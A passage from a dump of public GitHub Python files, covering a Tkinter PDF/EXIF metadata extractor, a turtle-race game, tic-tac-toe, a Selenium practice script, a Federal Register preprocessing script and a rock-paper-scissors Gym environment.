datetime.datetime.strptime(mod_date_str[:16], date_format)\n return mod_date.strftime('%Y-%m-%d %H:%M:%S')\n\ndef pdf_metadata(file_path):\n pdf_file = file_path\n \n info = extract_pdf_metadata(pdf_file)\n creation_date_str = info[0].get('CreationDate', '')\n creation_date_str = creation_date_str.decode('utf-8')\n creation_date = parse_creation_date(creation_date_str)\n\n mod_date_str = info[0].get('ModDate','')\n mod_date_str = mod_date_str.decode('ISO-8859-1')\n mod_date = parse_modification_date(mod_date_str)\n \n print(\"THE PDF METADATA IS AT BELOW\")\n for i in info:\n print('File Name\\t\\t : ' + pdf_file)\n print('Author of PDF\\t\\t : ' + i['Author'].decode('ISO-8859-1'))\n print('Creation Date\\t\\t : ' + creation_date)\n if 'Creator' in i:\n print('Creator of PDF\\t\\t : ' + i['Creator'].decode('ISO-8859-1'))\n 
print('Modification Date\\t : ' + mod_date)\n print('Producer\\t\\t : ' + i['Producer'].decode('ISO-8859-1'))\n\n\n#### IMAGE TYPE METADATA #####\n\n# path to the image or video\ndef image_metadata(file_path):\n imagename = file_path\n\n # read the image data using PIL\n image = Image.open(imagename)\n\n\n # extract other basic metadata\n info_dict = {\n \"Filename\": image.filename,\n \"Image Size\": image.size,\n \"Image Height\": image.height,\n \"Image Width\": image.width,\n \"Image Format\": image.format,\n \"Image Mode\": image.mode,\n \"Image is Animated\": getattr(image, \"is_animated\", False),\n \"Frames in Image\": getattr(image, \"n_frames\", 1)\n }\n\n for label,value in info_dict.items():\n print(f\"{label:25}: {value}\")\n\n # extract EXIF data\n exifdata = image.getexif()\n\n # iterating over all EXIF data fields\n for tag_id in exifdata:\n # get the tag name, instead of human unreadable tag id\n tag = TAGS.get(tag_id, tag_id)\n data = exifdata.get(tag_id)\n # decode bytes \n if isinstance(data, bytes):\n data = data.decode()\n print(f\"{tag:25}: {data}\")\n\n data = gpsphoto.getGPSData(imagename)\n if(data):\n print(\"GPS Info\\t\\t :\" )\n print(\"Latitude \\t\\t : \",data['Latitude'])\n print(\"Longitude \\t\\t : \", data['Longitude'])\n print(\"Google Map link \\t : https://www.google.com/maps/search/?api=1&query=\"+str(data['Latitude'])+\",\"+str(data['Longitude']))\n else:\n print('This file doesnt have GPS')\n \n\nclass App:\n def __init__(self, root):\n #setting title\n root.title(\"Metdata Extraction Tools\")\n #setting window size\n width=637\n height=311\n screenwidth = root.winfo_screenwidth()\n screenheight = root.winfo_screenheight()\n alignstr = '%dx%d+%d+%d' % (width, height, (screenwidth - width) / 2, (screenheight - height) / 2)\n root.geometry(alignstr)\n root.resizable(width=False, height=False)\n\n GLabel_806=tk.Label(root)\n GLabel_806[\"cursor\"] = \"arrow\"\n ft = tkFont.Font(family='Times',size=20)\n GLabel_806[\"font\"] = ft\n GLabel_806[\"fg\"] = \"#333333\"\n GLabel_806[\"justify\"] = \"center\"\n GLabel_806[\"text\"] = \"Metadata Extractor\"\n GLabel_806.place(x=0,y=20,width=631,height=46)\n\n enter_file_button=tk.Label(root)\n ft = tkFont.Font(family='Times',size=10)\n enter_file_button[\"font\"] = ft\n enter_file_button[\"fg\"] = \"#333333\"\n enter_file_button[\"justify\"] = \"center\"\n enter_file_button[\"text\"] = \"Enter file\"\n enter_file_button.place(x=120,y=150,width=88,height=41)\n\n submit_file_button=tk.Button(root)\n submit_file_button[\"bg\"] = \"#f0f0f0\"\n ft = tkFont.Font(family='Times',size=10)\n submit_file_button[\"font\"] = ft\n submit_file_button[\"fg\"] = \"#000000\"\n submit_file_button[\"justify\"] = \"center\"\n submit_file_button[\"text\"] = \"Submit\"\n submit_file_button.place(x=330,y=230,width=70,height=25)\n submit_file_button[\"command\"] = self.submit_file_button_command\n\n cancel_button=tk.Button(root)\n cancel_button[\"bg\"] = \"#f0f0f0\"\n ft = tkFont.Font(family='Times',size=10)\n cancel_button[\"font\"] = ft\n cancel_button[\"fg\"] = \"#000000\"\n cancel_button[\"justify\"] = \"center\"\n cancel_button[\"text\"] = \"Cancel\"\n cancel_button.place(x=250,y=230,width=70,height=25)\n cancel_button[\"command\"] = self.cancel_button_command\n\n find_file_button=tk.Button(root)\n find_file_button[\"bg\"] = \"#f0f0f0\"\n ft = tkFont.Font(family='Times',size=10)\n find_file_button[\"font\"] = ft\n find_file_button[\"fg\"] = \"#000000\"\n find_file_button[\"justify\"] = \"center\"\n find_file_button[\"text\"] = 
\"Find file\"\n find_file_button.place(x=470,y=150,width=62,height=38)\n find_file_button[\"command\"] = upload_file\n\n file_location_placeholder=tk.Label(root)\n ft = tkFont.Font(family='Times',size=10)\n file_location_placeholder[\"font\"] = ft\n file_location_placeholder[\"fg\"] = \"#333333\"\n file_location_placeholder[\"justify\"] = \"center\"\n self.file_location_placeholder=tk.Label(root)\n file_location_placeholder[\"relief\"] = \"sunken\"\n file_location_placeholder[\"borderwidth\"] = 2\n file_location_placeholder.place(x=200,y=150,width=265,height=36)\n # file_location_placeholder.config(text=\"file path\")\n\n def submit_file_button_command(self):\n \n find_file_type()\n\n def cancel_button_command(self):\n file_path = \" \"\n print(\"cancel\")\n\n\n def find_file_button_command():\n upload_file()\n \ndef show_popup_data(file_path):\n popup = tk.Toplevel()\n popup.title(\"Pop-up Window\")\n text = tk.Text(popup, text=find_file_type())\n button = tk.Button(popup, text=\"OK\", command=popup.destroy)\n output = image_metadata(file_path)\n text.pack(fill=tk.BOTH, expand=True)\n # Insert the output into the Text widget\n text.insert(tk.END, output)\n button.pack()\n\ndef show_popup_error():\n popup = tk.Toplevel()\n popup.title(\"Pop-up Window\")\n label = tk.Label(popup, text=\"Must Insert Valid File\")\n button = tk.Button(popup, text=\"OK\", command=popup.destroy)\n label.pack(fill=tk.BOTH, expand=True)\n button.pack()\n\ndef upload_file():\n global file_path \n file_path = filedialog.askopenfilename()\n\n print(file_path)\n main_window_instance.file_location_placeholder.config(text=file_path)\n # print(file_path)\n\ndef find_file_type():\n # print(\"File path: \",file_path)\n _, file_extension = os.path.splitext(file_path)\n file_extension = file_extension.lower()\n # file_path_extension = file_path.lower()\n\n if file_extension == '.pdf':\n # show_popup_data(file_path)\n pdf_metadata(file_path)\n elif file_extension == '.doc':\n print('doc')\n elif file_extension == '.jpg' or file_extension == '.png' or file_extension== '.jpeg' or file_extension == '.gif' or file_extension=='.jfif':\n return image_metadata(file_path)\n # add other file types as needed\n else:\n show_popup_error()\n\n\nif __name__ == \"__main__\":\n root = tk.Tk()\n main_window_instance = App(root)\n app = App(root)\n root.mainloop()\n\n## buat report based on the metadata\n## banyakkan file type\n## output ke .txt\n","repo_name":"dualspx/simple-exiftool-gui","sub_path":"Exiftools.py","file_name":"Exiftools.py","file_ext":"py","file_size_in_byte":9064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12991711415","text":"from turtle import Turtle, Screen;\nimport random\n\nscreen = Screen()\n\n\nscreen.setup(width=500,height=400)\nuser_bet = screen.textinput(title=\"make your bet\", prompt=\"What is your bet color? 
\")\n\ncolors= ['red','green','yellow']\n\nall_turtle=[]\n \n \nfor turtle_index in range(0,3):\n tim = Turtle(shape='turtle')\n tim.color(colors[turtle_index])\n tim.penup()\n tim.goto(x=-230,y=-50+(turtle_index *30))\n all_turtle.append(tim)\n \nis_race_on = False\n\nif user_bet:\n is_race_on = True\n\nwhile is_race_on:\n for turtle in all_turtle:\n if turtle.xcor() >230:\n wining_color = turtle.pencolor()\n if wining_color == user_bet:\n print(f'You won, The {wining_color} turtle is the winnser')\n is_race_on = False\n else:\n print(f'You Lose, The {wining_color} turtle is the winnser')\n is_race_on = False\n else:\n turtle.forward(random.randint(0,10))\n\n\n\n\n\n\nscreen.exitonclick()","repo_name":"Techharik/100_python_interm","sub_path":"day19/day19_1.py","file_name":"day19_1.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3901249281","text":"#!/usr/bin/python3\n\nfrom collections import namedtuple\nfrom os import system\nfrom random import randint\nfrom time import sleep\n\n\ndef check_game_state():\n game_over = False\n winner = is_winner()\n if winner:\n clear_screen()\n draw_board()\n print(f\"Congratulations {winner}, you are the winner!\")\n game_over = True\n if not winner and len(remaining_spaces) == 0:\n clear_screen()\n draw_board()\n print(\"It's a tie.\")\n game_over = True\n if game_over:\n play_again = input(\"\\nDo you want to play again [Y/N]? \")\n if play_again.casefold() == \"y\":\n return (True, \"y\")\n else:\n return (False, \"n\")\n return (True, \"n\")\n\n\ndef clear_screen():\n system(\"clear\")\n\n\ndef draw_board():\n rows = [\n \"\\n | | \", f\"\\n {board['7']} | {board['8']} | {board['9']} \", \"\\n | | \",\n \"\\n\", \"-\" * 18,\n \"\\n | | \", f\"\\n {board['4']} | {board['5']} | {board['6']} \", \"\\n | | \",\n \"\\n\", \"-\" * 18,\n \"\\n | | \", f\"\\n {board['1']} | {board['2']} | {board['3']} \", \"\\n | | \",\n \"\\n\" * 2\n ]\n for row in rows:\n print(row, end=\"\")\n\n\ndef get_player_information(player_number):\n name = input(f\"Player {player_number}, please enter your name: \")\n mark = input(f\"{name}, please choose your mark [{'/'.join(marks)}]: \")\n marks.remove(mark)\n return Player(player_number, name, mark)\n\n\ndef is_winner():\n if look_for_winning_combination(current_player.mark) == \"Found!\":\n return current_player.name\n else:\n return None\n\n\ndef look_for_winning_combination(mark):\n winning_combinations = [\n [\"1\", \"2\", \"3\"], [\"1\", \"4\", \"7\"], [\"1\", \"5\", \"9\"], [\"2\", \"5\", \"8\"],\n [\"3\", \"5\", \"7\"], [\"3\", \"6\", \"9\"], [\"4\", \"5\", \"6\"], [\"7\", \"8\", \"9\"]\n ]\n marked_spaces = list(filter(lambda key: board[key] == mark, board.keys()))\n for winning_combination in winning_combinations:\n for space in winning_combination:\n if space not in marked_spaces:\n break\n else:\n return \"Found!\"\n return \"Not found.\"\n\n\ndef place_mark(mark, space):\n board[space] = f\"{mark}\"\n remaining_spaces.pop()\n\n\ndef randomly_pick_starting_player():\n return player_1 if randint(1, 2) == 1 else player_2\n\n\ndef start_game():\n empty_board = {\n \"7\": \" \", \"8\": \" \", \"9\": \" \",\n \"4\": \" \", \"5\": \" \", \"6\": \" \",\n \"1\": \" \", \"2\": \" \", \"3\": \" \",\n }\n empty_spaces = [\" \"] * 9\n starting_player = randomly_pick_starting_player()\n print(f\"\\n{starting_player.name} will have the opening move.\")\n sleep(5)\n return (True, \"n\", empty_board, empty_spaces, 
starting_player)\n\n\ndef switch_player():\n return player_2 if current_player == player_1 else player_1\n\n\nPlayer = namedtuple(\"Player\", [\"number\", \"name\", \"mark\"])\nmarks = [\"O\", \"X\"]\nplayer_1 = get_player_information(\"1\")\nplayer_2 = get_player_information(\"2\")\n\nplay, play_again, board, remaining_spaces, current_player = start_game()\n\nwhile play:\n clear_screen()\n draw_board()\n space = input(f\"{current_player.name}, where do you want to place {current_player.mark} [1-9]? \")\n place_mark(current_player.mark, space)\n play, play_again = check_game_state()\n if not play:\n continue\n if play_again == \"y\":\n play, play_again, board, remaining_spaces, current_player = start_game()\n continue\n current_player = switch_player()\n","repo_name":"martinvrba/complete-python-bootcamp","sub_path":"Milestone_Project_1/mp1_main.py","file_name":"mp1_main.py","file_ext":"py","file_size_in_byte":3514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22299915847","text":"from time import time\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service #here service is a object\nfrom selenium.webdriver.common.by import By\nimport time\n#service is a class\nservice_obj = Service(\"D:\\Automation\\Selenium_Python_Udemy\\drivers\\chromedriver.exe\")\ndriver = webdriver.Chrome(service=service_obj)\n\ndriver.maximize_window()\n\n# driver.get(\"https://rahulshettyacademy.com/dropdownsPractise/\")\n# time.sleep(5)\n# driver.find_element(By.ID,\"autosuggest\").send_keys(\"ind\")\n# time.sleep(2)\n# # driver.find_element(By.CSS_SELECTOR,\"input[class='inputs ui-autocomplete-input valid']\").send_keys(\"del\")\n# # time.sleep(2)\n# countries =driver.find_elements(By.CSS_SELECTOR, \"p[class*='blackText']\")\n# print(len(countries))\n# # for country in countries:\n# # if countries.text ==\"India\":\n# # countries.click()\n# # break\n\n\n# # driver.find_element(By.XPATH,\"//p[text()='Delhi, India']\").click()\n# #vedio 41\n\n# # print(driver.find_element(By.ID,\"autosuggest\").text)\n# assert print(driver.find_element(By.ID,\"autosuggest\").get_attribute(\"value\")) == \"India\"\n\n# *******************************\n\ndriver.get(\"https://rahulshettyacademy.com/AutomationPractice/\")\ntime.sleep(5)\ndriver.find_element(By.XPATH,\"//*[@class='inputs ui-autocomplete-input']\").send_keys(\"ind\")\ntime.sleep(2)\ncountries = driver.find_elements(By.XPATH,\"//*[@class='ui-menu-item-wrapper']\") # //*[@class='ui-menu-item']/div\ntime.sleep(2)\n# countries =driver.find_elements(By.CSS_SELECTOR, \"p[class*='blackText']\")\nprint(len(countries))\nfor country in countries:\n if country.text == \"India\":\n country.click()\n break\n\n\n# driver.find_element(By.XPATH,\"//p[text()='Delhi, India']\").click()\n#vedio 41\n\n# print(driver.find_element(By.ID,\"autosuggest\").text)\nassert print(driver.find_element(By.ID,\"autosuggest\").get_attribute(\"value\")) == \"India\"\n\n\n\n\n\n","repo_name":"darvinjoseph/automation","sub_path":"Keerthana/Demo_15_FindElementTest.py","file_name":"Demo_15_FindElementTest.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25854384940","text":"#%% --------------------------------------------------\n# initialize\n\n# import packages\nimport json\nfrom pathlib import Path\nimport warnings\n\nimport numpy as np\nimport pandas as pd\n\nfrom clean_agencies import *\nfrom 
columns_to_date import *\n\n# set directory path\np = Path.cwd()\ndata_dir = p.parent.joinpath('data', 'raw')\nif data_dir.exists():\n pass\nelse:\n print(\"Directory doesn't exist.\")\n\n# ignore warnings\nwarnings.filterwarnings(\"ignore\")\n\n#%% --------------------------------------------------\n# load data\nfilePath = data_dir / r\"documents_endpoint_rules_combo_1994_1999.json\"\nwith open(filePath, \"r\") as f:\n data = json.load(f)\n\n# convert to dataframe and check structure\ndf = pd.DataFrame(data['results'])\ndf.info()\nprint(\"#\", 50 * \"-\")\n\n#%% --------------------------------------------------\n# Examine target labels\n# categories of documents to examine\nprint(\"All document types: \", df['type'].value_counts(), sep='\\n')\nprint(\"#\", 50 * \"-\")\n\n# filter df of core document types\ncore_types = [\"Notice\", \"Rule\", \"Proposed Rule\", \"Presidential Document\"]\nbool_core = np.array([True if t in core_types else False for t in df['type'].tolist()])\ndfCore = df.loc[bool_core, :]\nprint(\"Labeled documents (4 main types):\", dfCore[\"type\"].value_counts(), sep='\\n')\nprint(\"#\", 50 * \"-\")\n\n# Uncategorized Documents\nbool_uncat = np.array([True if t == \"Uncategorized Document\" else False for t in df['type'].tolist()])\ndfUncat = df.loc[bool_uncat, :]\nprint(\"Unlabeled Documents:\", dfUncat[\"type\"].value_counts(), sep='\\n')\nprint(\"#\", 50 * \"-\")\n\n#%% --------------------------------------------------\n# Data cleaning\n\n# clean up publication date column\ndfCore.loc[:, 'publication_dt'] = column_to_date(dfCore, 'publication_date')\ndfCore.loc[:, 'publication_year'] = dfCore['publication_dt'].apply(lambda x: x.year)\n\n# clean up agencies column\ndfCore = FR_clean_agencies(dfCore, column='agencies')\n\n# fix negative page length; impute with length == 1\nbool_fix = np.array(dfCore['page_length'] <= 0)\ndfCore.loc[bool_fix, 'page_length'] = 1\n\n#%% --------------------------------------------------\n# Create new variables\n\n# count of UQ agencies per document\ndfCore.loc[:, 'agencies_count_uq'] = dfCore['agencies_slug_uq'].apply(lambda x: len(x))\n\n# reformat agency columns\ndfCore.loc[:, 'agencies_slug_uq'] = dfCore['agencies_slug_uq'].apply(lambda x: \"; \".join(x))\ndfCore.loc[:, 'agencies_id_uq'] = dfCore['agencies_id_uq'].apply(lambda x: \"; \".join(list(map(str,x))))\n\n# create abstract length variable\n# simple tokenization of 'abstract' column using whitespace characters\ndfCore.loc[:, 'abstract_tokens'] = dfCore['abstract'].str.split(pat=r'\\s', regex=True)\nabstract_length = [len(a) if a is not None else 0 for a in dfCore.loc[:, 'abstract_tokens']]\ndfCore.loc[:, 'abstract_length'] = abstract_length\n\n# extract page_views count\ndfCore.loc[:, 'page_views_count'] = dfCore['page_views'].apply(lambda x: int(x['count']))\n\n# convert significant to categorical: 0 (false), 1 (true), 2 (unknown/nan)\nbool_na = dfCore['significant'].isna()\ndfCore.loc[bool_na, 'sig'] = 2\nbool_f = dfCore['significant'] == False\ndfCore.loc[bool_f, 'sig'] = 0\nbool_t = dfCore['significant'] == True\ndfCore.loc[bool_t, 'sig'] = 1\nprint(dfCore['sig'].value_counts(dropna=False), '\\n')\n\n# effective date exists\nbool_exists = dfCore['effective_on'].notna()\ndfCore.loc[:, 'effective_date_exists'] = int(0)\ndfCore.loc[bool_exists, 'effective_date_exists'] = int(1)\nprint(dfCore['effective_date_exists'].value_counts(dropna=False), '\\n')\n\n# comments_close_on exists\nbool_exists = dfCore['comments_close_on'].notna()\ndfCore.loc[:, 'comments_close_exists'] = 
int(0)\ndfCore.loc[bool_exists, 'comments_close_exists'] = int(1)\nprint(dfCore['comments_close_exists'].value_counts(dropna=False), '\\n')\n\n# extract RIN count\ndfCore.loc[:, 'RIN_count'] = dfCore['regulation_id_numbers'].apply(lambda x: len(x))\nprint(dfCore['RIN_count'].value_counts(dropna=False), '\\n')\n\n# extract CFR references count\ndfCore.loc[:, 'CFR_ref_count'] = dfCore['cfr_references'].apply(lambda x: len(x))\nprint(dfCore['CFR_ref_count'].value_counts(dropna=False), '\\n')\n\n# regs dot gov info exists\ndfCore.loc[:, 'docket_exists'] = [0 if x == {} else 1 for x in dfCore['regulations_dot_gov_info']]\nprint(dfCore['docket_exists'].value_counts(dropna=False), '\\n')\n\n# document issued by Executive Office of the President\nbool_na = np.array(dfCore['agencies_count_uq'].notna())\nbool_eop = np.array(dfCore.loc[bool_na, 'agencies_slug_uq'].apply(\n lambda x: 'executive-office-of-the-president' in x.split(\"; \")))\ndfCore.loc[:, 'eop'] = 0\ndfCore.loc[bool_eop, 'eop'] = 1\nprint(dfCore['eop'].value_counts(dropna=False), '\\n')\n\n#%% --------------------------------------------------\n# Text column cleaning\n# these columns: # action; abstract; title; [dates?]\n\n# boolean for filtering presidential documents\n# bool_prez = np.array(dfCore['type'] == \"Presidential Document\") -- better not to use labels to generate features\nbool_eop = np.array(dfCore['eop'] == 1)\n\n# impute missing text: action\nbool_na = np.array(dfCore['action'].isna())\ndfCore.loc[bool_na & bool_eop, 'action'] = 'presidential document'\ndfCore.loc[bool_na & ~bool_eop, 'action'] = dfCore.loc[bool_na & ~bool_eop, 'title'].tolist()\n\n# impute missing text: abstract/summary\nbool_na = np.array(dfCore['abstract'].isna())\ndfCore.loc[bool_na & bool_eop, 'abstract'] = 'presidential document'\ndfCore.loc[bool_na & ~bool_eop, 'abstract'] = dfCore.loc[bool_na & ~bool_eop, 'title'].tolist()\n\n#%% --------------------------------------------------\n# Filter dataframe columns\n\n# columns to keep for modeling\nlabel_col = ['type']\nid_cols = ['document_number', 'citation', 'agencies_id_uq', 'agencies_slug_uq', 'publication_year']\nnum_cols = ['page_length', 'agencies_count_uq', 'abstract_length', 'page_views_count', 'RIN_count', 'CFR_ref_count']\ncat_cols = ['sig', 'effective_date_exists', 'comments_close_exists', 'docket_exists', 'eop']\ntext_cols = ['action', 'abstract', 'title']\nkeep_cols = label_col + id_cols + num_cols + cat_cols + text_cols\n\n# create new dataframe\ndfModeling = dfCore.loc[:, keep_cols].copy()\n\n#%% --------------------------------------------------\n# Export data for modeling\n\n# set directory path\np = Path.cwd()\ndata_dir = p.parent.joinpath('data', 'processed')\nif data_dir.exists():\n pass\nelse:\n try:\n data_dir.mkdir(parents=True)\n except:\n print(\"Cannot create data directory.\")\n\n# save as csv\nfilePath = data_dir / r\"labeled_data_for_modeling.csv\"\nwith open(filePath, \"w\", encoding=\"utf-8\") as f:\n dfModeling.to_csv(f, index_label=\"index\", line_terminator=\"\\n\")\n\n# check if saved\nif filePath.exists():\n print(\"Saved as CSV!\")\nelse:\n print(\"Error saving file.\")\n","repo_name":"mfebrizio/data-mining-project","sub_path":"code/data_preprocessing.py","file_name":"data_preprocessing.py","file_ext":"py","file_size_in_byte":6711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4457917814","text":"# -*- coding: utf-8 -*-\n\"\"\"\nじゃんけん対戦するOpenAI Gym 環境クラスを提供するモジュール\n\"\"\"\nimport random\nimport numpy 
as np\nimport gym\nfrom gym import spaces\n\nclass RockPaperScissorsEnv(gym.Env):\n \"\"\"\n OpenAI Gym 準拠のじゃんけん対戦環境クラス。\n 必要最小限の実装のみ。\n \"\"\"\n def __init__(self, player):\n \"\"\"\n 方策側の相手となる環境側プレイヤーを\n インスタンス変数へ格納し、\n 行動空間・観測空間の定義を行い、\n 観測の初期化を行う。\n 引数:\n player 環境側プレイヤーインスタンス\n 戻り値:\n なし\n \"\"\"\n super().__init__()\n self.player = player\n # 行動空間:0=グー、1=パー、2=チョキ\n self.action_space = spaces.Discrete(2)\n # 観測空間:過去100件分の[方策側行動, 環境側行動]\n self.observation_space = spaces.Box(\n low=0, high=2, shape=(100, 2), dtype=np.int8)\n # 観測初期化\n self.observation = self.init_observation()\n\n def reset(self):\n \"\"\"\n エピソード開始時の観測を取得する。\n インスタンス変数observationの値をそのまま返却する。\n 引数:\n なし\n 戻り値:\n 観測 [ 自分の行動, 敵の行動 ]×100\n \"\"\"\n return self.observation\n\n def step(self, action):\n \"\"\"\n 方策が選択した行動を受け取り、更新後の観測、報酬、\n エピソード完、その他情報(空の辞書)を返却する。\n 引数:\n action 自分の行動\n 戻り値:\n observation 更新後の観測\n reward 報酬値\n done エピソード完(真:完了、偽:あいこ)\n info その他情報(空の辞書)\n \"\"\"\n policy_action = int(action)\n env_action = int(self.player.predict(self.observation))\n self.observation = self.update_observation(\n self.observation, policy_action, env_action)\n reward = self.calc_reward(policy_action, env_action)\n done = self.is_done(policy_action, env_action)\n return self.observation, reward, done, {}\n\n @staticmethod\n def init_observation():\n \"\"\"\n エピソード開始時の観測を取得する。\n 引数:\n なし\n 戻り値:\n observation 観測(初期値)\n \"\"\"\n # 観測初期化\n observation = []\n for _ in range(100):\n # 乱数で初期化\n observation.append([\n random.randrange(2), \n random.randrange(2)])\n return observation\n\n @staticmethod\n def update_observation(observation, policy_action, env_action):\n \"\"\"\n 観測の先頭(最古の両者の手)を削除し、末尾に最新の両者の手を追加して\n 返却する。\n 引数:\n observation 更新対象となる観測\n policy_action 方策側の行動\n env_action 環境側の行動\n 戻り値:\n observation 更新後の観測\n \"\"\"\n observation.pop(0)\n observation.append([policy_action, env_action])\n return observation\n\n @staticmethod\n def is_done(policy_action, env_action):\n \"\"\"\n エピソード完了かどうかを判別する。\n 引数:\n policy_action 方策側の行動\n env_action 環境側の行動\n 戻り値:\n done エピソード完(真:完了、偽:あいこ)\n \"\"\"\n return False if policy_action == env_action else True\n\n @staticmethod\n def calc_reward(policy_action, env_action):\n \"\"\"\n 報酬関数。\n 方策側の行動、環境側の行動から報酬値を算出する。\n 引数:\n policy_action 方策側の行動\n env_action 環境側の行動\n 戻り値:\n 方策側が受け取る報酬値(float)\n \"\"\"\n if policy_action == 0: # 方策側:グー\n if env_action == 1: # 環境側:パー\n return -10\n elif env_action == 2: # 環境側:チョキ\n return 10\n else: # 環境側:グー\n return -1\n elif policy_action == 1: # 方策側:パー\n if env_action == 1: # 環境側:パー\n return -1\n elif env_action == 2: # 環境側:チョキ\n return -10\n else: # 環境側:グー\n return 10\n else: # 方策側:チョキ\n if env_action == 1: # 環境側:パー\n return 10\n elif env_action == 2: # 環境側:チョキ\n return -1\n else: # 環境側:グー\n return -10\n\nclass EvalEnv(RockPaperScissorsEnv):\n \"\"\"\n じゃんけんAI用方策の評価用環境クラス。\n \"\"\"\n # render モード\n metadata = {'render.modes': ['console', 'ansi', 'json']}\n def __init__(self, player):\n \"\"\"\n インスタンス変数infoを初期化する。\n 引数:\n player 環境側プレイヤーインスタンス\n 戻り値:\n なし\n \"\"\"\n super().__init__(player)\n self.info = {\n 'env_id': 'RockPaperScissors-v0', # env id\n 'enemy_player': self.player.__class__.__name__, # 対戦オブジェクトクラス名\n 'episode_no': 0, # 現在のエピソード\n 'step_no': 0, # 現在のステップ\n 'total_reward': 0.0, # エピソード内報酬合計\n }\n\n def reset(self):\n \"\"\"\n エピソード開始時の観測を取得する。\n インスタンス変数observationの値をそのまま返却する。\n 引数:\n なし\n 戻り値:\n 観測 [ 自分の行動, 敵の行動 ]×100\n \"\"\"\n self.info['episode_no'] = self.info['episode_no'] + 1\n self.info['step_no'] = -1.0\n self.info['total_reward'] = 0.0\n 
return super().reset()\n\n def step(self, action):\n \"\"\"\n 親クラスのstep()を実行し、infoとして実行中ステップ情報を\n 返却する\n 引数:\n action 自分の行動\n 戻り値:\n observation 更新後の観測\n reward 報酬値\n done エピソード完(真:完了、偽:あいこ)\n info その他情報(ステップ情報)\n \"\"\"\n\n observation, reward, done, _ = super().step(action)\n self.info['step_no'] = self.info.get('step_no', -1) + 1\n self.info['total_reward'] = self.info['total_reward'] + reward \n return observation, reward, done, self.info\n\n def render(self, mode='console'):\n \"\"\"\n 環境の状態を可視化する。\n 引数:\n mode console:標準出力、ansi:文字列返却\n 戻り値:\n None: console指定時\n 文字列: ansi指定時\n \"\"\"\n msg = '+++ episode:{}, step:{}, '.format(\n str(self.info['episode_no']), str(self.info['step_no']))\n last_obs = 'recent policy action: ' + str(self.observation[-3][0]) + \\\n ',' + str(self.observation[-2][0]) + \\\n ',' + str(self.observation[-1][0]) \n msg = msg + last_obs\n if mode == 'console':\n print(msg)\n return None\n elif mode == 'ansi':\n return msg\n elif mode == 'json':\n return {\n 'episode_no': self.info['episode_no'],\n 'step_no': self.info['step_no'],\n 'policy_action': self.observation[-1][0],\n 'env_action': self.observation[-1][1],\n 'done': self.is_done(self.observation[-1][0], self.observation[-1][1]),\n 'reward': self.calc_reward(self.observation[-1][0], self.observation[-1][1]),\n 'total_reward': self.info['total_reward'],\n }\n else:\n raise ValueError(f'mode={mode}: no match argument')\n\nclass Player:\n \"\"\"\n プレイヤー基底クラス。\n \"\"\"\n def predict(self, observation):\n \"\"\"\n 引数observationをもとに次の行動を選択する。\n 本実装ではobservationを一切使用せずに、ランダムに行動を選択する。\n 引数:\n observation 観測(使用しない)\n 戻り値:\n ランダムに選択された行動\n \"\"\"\n return random.randrange(2)\n\nclass ProbPlayer(Player):\n \"\"\"\n コンストラクタで渡された各手の確率に従ってランダムに手を出す\n プレイヤークラス。\n \"\"\"\n def __init__(self, prob_list=[0.333, 0.333, 0.334]):\n \"\"\"\n 各手の確率リストをインスタンス変数へ格納する。\n 引数:\n prob_list 各手の確率\n 戻り値:\n なし\n \"\"\"\n self.prob_list = [\n float(prob_list[0])/float(sum(prob_list)),\n float(prob_list[1])/float(sum(prob_list)),\n float(prob_list[2])/float(sum(prob_list)),\n ]\n \n def predict(self, observation):\n \"\"\"\n 引数observationをもとに次の行動を選択する。\n 本実装ではobservationを一切使用せずに、\n 各手の確率に従ってランダムに行動を選択する。\n 引数:\n observation 観測(使用しない)\n 戻り値:\n 各手の確率に従ってランダムに選択された行動\n \"\"\"\n value = random.uniform(0.0, 1.0)\n if value <= self.prob_list[0]:\n return 0 # グー\n elif value <= (self.prob_list[0] + self.prob_list[1]):\n return 1 # パー\n else:\n return 2 # チョキ\n\nclass EnemyPlayer(ProbPlayer):\n \"\"\"\n 1/3の確率でグー・パー・チョキを選択するプレイヤー。\n \"\"\"\n def __init__(self):\n \"\"\"\n prob_list の要素がすべて1/3として親クラスの\n コンストラクタを呼び出す。\n 引数:\n なし\n 戻り値:\n なし\n \"\"\"\n super().__init__(prob_list=[1.0/3.0, 1.0/3.0, 1.0/3.0])\n\nclass JurinaPlayer(Player):\n \"\"\"\n 常に同じ手を出すプレイヤー。\n \"\"\"\n def __init__(self, action=1):\n \"\"\"\n 常に出す手をインスタンス変数へ格納する。\n 引数:\n action 常に出す手(デフォルト:パー)\n \"\"\"\n self.action = action\n\n def predict(self, observstion):\n \"\"\"\n 引数observationをもとに次の行動を選択する。\n 本実装ではobservationを一切使用せずに、\n 常に同じ行動を選択する。\n 引数:\n observation 観測(使用しない)\n 戻り値:\n コンストラクタで指定された行動\n \"\"\"\n return self.action\n\nclass AIPlayer(Player):\n \"\"\"\n 学習済みモデルを使って行動を決めるプレイヤー。\n 学習済みモデルと対戦評価する際に使用する。\n \"\"\"\n def __init__(self, model):\n \"\"\"\n 学習済みモデルをコンストラクタに指定する。\n 引数:\n model 学習済みモデルクラスのインスタンス\n 戻り値:\n なし\n \"\"\"\n self.model = model\n \n def predict(self, observation):\n \"\"\"\n 引数observationをもとに次の行動を選択する。\n 本実装では学習済みモデルクラスのpredictメソッドを使って\n 行動を選択する。\n 引数:\n observation 観測\n 戻り値:\n 学習済みモデルが選択した行動\n \"\"\"\n return int(self.model.predict(observation)[0])\n\n# 
